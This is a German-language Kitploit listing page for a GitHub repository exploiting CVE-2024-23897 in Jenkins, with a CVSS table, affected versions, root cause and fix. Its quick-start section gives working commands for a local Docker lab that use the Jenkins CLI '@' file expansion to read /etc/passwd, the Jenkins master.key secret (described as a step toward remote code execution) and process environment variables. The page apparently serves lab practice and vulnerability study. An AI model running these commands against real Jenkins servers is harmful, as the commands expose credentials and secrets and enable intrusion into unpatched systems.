Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-23897 | Kitploit
Tools/GitHubGitHub/dungsocool/cve-2024-23897
SchwachstellenscannerExploitationWebsicherheitLernen & BildungLabs & Praxis
GitHubdungsocool/cve-2024-23897

CVE-2024-23897

Repository anzeigen
vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-23897 — Jenkins CLI Beliebiger Dateilese

Schnellstart

root@kitploit:~
# 1. Start lab
docker-compose up -d

# 2. Wait ~30s, then download CLI tool
curl -O http://localhost:8080/jnlpJars/jenkins-cli.jar

# 3. Exploit — read /etc/passwd (full file)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/etc/passwd

# 4. Read master.key (chain to RCE)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/var/jenkins_home/secrets/master.key

# 5. Read environment variables
java -jar jenkins-cli.jar -s http://localhost:8080 -http help @/proc/self/environ

Details

Siehe REPORT.md für die vollständige technische Analyse (Vietnamesisch).

ElementWert
CVSS9.8 (Kritisch)
BetroffenJenkins <= 2.441, LTS <= 2.426.2
Lab-Versionjenkins/jenkins:2.426.2-lts
Grundursacheargs4j expandAtFiles auf der serverseitigen CLI aktiviert
BehebungUpgrade auf Jenkins >= 2.442 / LTS >= 2.426.3

Aufräumen

root@kitploit:~
docker-compose down -v --remove-orphans
Tool herunterladen